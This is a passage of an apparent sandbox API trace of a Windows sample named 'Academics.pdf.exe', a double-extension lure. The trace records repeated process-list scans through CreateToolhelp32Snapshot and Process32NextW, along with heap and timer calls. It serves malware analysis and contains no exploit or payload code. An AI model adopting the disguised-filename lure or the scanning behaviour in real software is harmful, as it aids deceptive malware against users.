cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.323] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.327] CloseHandle (hObject=0x294) returned 1 [0291.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.328] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0291.328] TranslateMessage (lpMsg=0x8bf970) returned 0 [0291.328] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0291.328] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0291.328] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0291.328] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.328] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.340] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.384] CloseHandle (hObject=0x294) returned 1 [0291.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.384] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.384] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.399] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.404] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.406] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, 